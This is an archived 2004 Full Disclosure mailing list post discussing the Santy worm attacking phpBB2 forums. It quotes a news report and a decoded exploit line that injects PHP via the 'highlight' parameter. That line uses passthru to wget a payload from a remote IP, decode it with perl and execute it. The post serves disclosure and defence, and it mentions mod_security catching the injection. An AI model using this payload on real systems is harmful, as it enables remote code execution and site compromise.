Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

RE: RE: Worm hitting PHPbb2 Forums
From: Paul Laudanski <zx () castlecops com>
Date: Thu, 23 Dec 2004 23:40:46 -0500 (EST)

On Thu, 23 Dec 2004, Patrick Nolan wrote:

A bot is not uploaded, not sure where that came from.
And by now, it is not expected to be spreading at all, thanks to the
interruption in search requests by Google.

There are a couple posts going on about this, for instance take this 
article:

http://www.cbronline.com/article_news.asp?guid=366C3494-1446-4A8B-973C-F67044266D35

[quote]
"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The 
exploit it uses is only able to transfer around 20 bytes of data at a 
time. So the worm transfers itself from one web site to another in small 
chunks."

"If a chunk gets missing, the worm might still work fine... or it might 
fail," Hypponen told ComputerWire. "More generations there are, more 
likely it is to fail because of this."
[/quote]

Compare that to an exploit that is posted @bugtraq:

http://www.securityfocus.com/archive/1/385208

(decoded)

[quote]
rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe 
y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/
.b| perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'
[/quote]

It is making use of the highlight exploit in pre phpbb 2.0.11.

Even though the 'worm' itself may be hindered, we can certainly expect 
script kiddies to attempt these manually.

http://www.modsecurity.org/blog/archives/000046.html

Now that is catching the single quote in the highlight argument.

-- 
Regards,

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]